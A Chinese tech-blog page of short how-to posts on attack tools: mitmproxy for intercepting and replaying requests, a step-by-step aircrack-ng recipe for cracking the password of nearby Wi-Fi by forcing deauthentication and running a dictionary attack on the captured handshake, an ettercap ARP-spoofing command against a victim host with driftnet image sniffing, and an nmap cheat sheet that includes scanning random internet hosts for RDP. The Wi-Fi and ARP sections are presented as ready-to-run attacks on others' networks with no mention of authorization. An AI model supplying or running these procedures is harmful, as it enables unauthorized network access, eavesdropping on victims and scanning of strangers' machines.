分类
IT运维

mitmproxy中间人攻击利器

mitmproxy就是代理,有篡改功能的代理。它支持两种模式,正向代理,与透明代理,支持http通信与https通信。
1>mitmproxy安装
sudo apt-get install mitmproxy
2>mitmproxy使用
mitmproxy -p xxx(指定端口)
3>mitmproxy常见操作
(1)方向键定位请求
(2)当黄色箭头>>定位到指定请求时,按回车enter进入请求中
(3)按e进入编辑状态
(4)a 增加一行,tab键切换编辑字段,回车enter开始编辑,esc保存,q返回上一级
(5)修改完后,按r就可以重放请求

分类
IT运维

利用aircrack-ng工具获取附近wifi的密码

1>关闭网络
service network-manager stop

2>结束可能会影响结果的进程
airmon-ng check kill

3>查看网卡列表
iwconfig

4>启动网卡到监听模式(这里使用wlan0)
airmon-ng start wlan0

5>监听周围所有无线网络信息
airodump-ng mon0

6>监听感兴趣的无线网络
airodump-ng –bssid C0:XX:XX:XX:XX -c 1 -w tmp mon0
在这条命令中–bssid后接我们上一部接下的BSSID值,即:C0:XX:XX:XX:XX:00。而-c后接的是我上一步在CH列下找到的值1。而-w后接的是我们保存网络数据的文件名,这里是用tmp。在命令的最后接的是之前得到的mon0
运行命令后会得到上图的结果,并确保上图的下半部分BSSID下有至少一行的数据

7>得到握手包
保持上一步中的窗口不关,新开一个窗口,执行如下命令:
aireplay-ng -0 2 -a C0:XX:XX:XX:XX:00 -c 14:XX:XX:XX:XX:B4 mon0
在这条命令中参数-a后接的是上图中下半部分BSSID列下第一行的的值C0:XX:XX:XX:XX:00。参数-c后接的是上图中下半部分STATION列下第一行的的值14:XX:XX:XX:XX:B4。mon是之前步骤得到的值。

8>关闭监听接口
airmon-ng stop mon0

9>启动网络
service network-manager start

10>获取密码
此时在执行第3.2步骤中命令的目录下会有一个tmp-01.cap文件。有了这个文件我们就可以破解密码了,除了这个文件外,我们还需要一个字典文件。可以从这里下载,下载后解压出密码文件,假设其名字及路径为:/tmp/passwd.txt。执行下面的命令。如果密码字典中有这个wifi的密码,我们就可以破解出密码:
aircrack-ng tmp-01.cap -w /tmp/passwd.txt

分类
IT运维

使用ettercap和drifnet进行arp攻击测试

1、攻击者ip:192.168.1.101
网关:192.168.1.1
被攻击者ipip:192.168.1.102

2、使用iwconfig命令查看无线网卡名称为wlan0

3、ettercap命令如下:
ettercap -i wlan0 -Tq -M arp:remote //192.168.1.102// //192.168.1.1//

4、使用driftnet查看图片
driftnet -i wlan0

分类
IT运维

nmap扫描探测常用命令

Nmap是一款网络扫描和主机检测的非常有用的工具。可用于:主机发现,端口发现或枚举,服务发现和操作系统检测,硬件地址,以及软件版本检测。它有命令行界面和图形用户界面。
1、检测主机

#检测单台主机
nmap 192.168.1.1
#检测多台主机
nmap 192.168.1.1 192.168.1.100
#检测一个网段
nmap 192.168.1.1/24
#检测一个范围
nmap 192.168.1.1-100
#检测文件中的ip列表
nmap -iL target.txt
#检测特定主机上的端口
nmap -p80,21 192.168.1.1

2、Tcp SYN scan (sS) 这是一个基本的扫描方式,它被称为半开放扫描,因为这种技术使得Nmap不需要通过完整的握手,就能获得远程主机的信息。Nmap发送SYN包到远程主机,但是它不会产生任何会话。因此不会在目标主机上产生任何日志记录,因为没有形成会话。

nmap -sS 192.168.1.1

3、Tcp connect() scan(sT)如果不选择SYN扫描,TCP connect()扫描就是默认的扫描模式。

nmap -sT 192.168.1.1

4、Udp scan(sU) 顾名思义,这种扫描技术用来寻找目标主机打开的UDP端口。

nmap -sU 192.168.1.1

5、FIN scan(sF) 有时候TcpSYN扫描不是最佳的扫描模式,因为有防火墙的存在。目标主机有时候可能有IDS和IPS系统的存在,防火墙会阻止掉SYN数据包。发送一个设置了FIN标志的数据包并不需要完成TCP的握手。

nmap -sF 192.168.1.1

6、PING scan(sP) PING扫描不同于其它的扫描方式,因为它只用于找出主机是否是存在在网络中的。它不是用来发现是否开放端口的。

nmap -sP 192.168.1.1

7、VERSION scan(sV) 版本检测是用来扫描目标主机和端口上运行的软件的版本。它不同于其它的扫描技术,它需要从开放的端口获取信息来判断软件的版本。使用版本检测扫描之前需要先用TCPSYN扫描开放了哪些端口。

nmap -sV -p 80,21 192.168.1.1

8、操作系统识别

nmap -O 192.168.1.1

9、如果远程主机有防火墙,IDS和IPS系统,有时候会组织掉ping请求。这时可以使用PN或者P0参数。

nmap -PN 192.168.1.1
nmap -P0 192.168.1.1

10、扫描随机目标

nmap -iR 1000
nmap -p 3389 -iR 1000

11、TCP Ack Ping 扫描,这种类型的扫描将只会扫描ACK包,如同其他ping选项一样,对于封锁标准ICMP ping的情况是非常有用的。

nmap –PA 192.168.1.1

12、端口状态:扫描之后,你可能会看到一些端口状态如 open(开放的),filtered(被过滤的),closed(关闭的)等等。解释如下:
– Open(开放的): 应用程序正在这个端口上监听连接。
– Closed(关闭的): 端口对探测做出了响应,但是现在没有应用程序在监听这个端口。
– Filtered(过滤的): 端口没有对探测做出响应。同时告诉我们探针可能被一些过滤器(防火墙)终止了。
– Unfiltered(未被过滤的):端口对探测做出了响应,但是Nmap无法确定它们是关闭还是开放。
– Open/Filtered: 端口被过滤或者是开放的,Nmap无法做出判断。
– Closed/Filtered: 端口被过滤或者是关闭的,Nmap无法做出判断。
原创内容转载请保留出处GEEK笔记(http://www.geekapp.cn/)。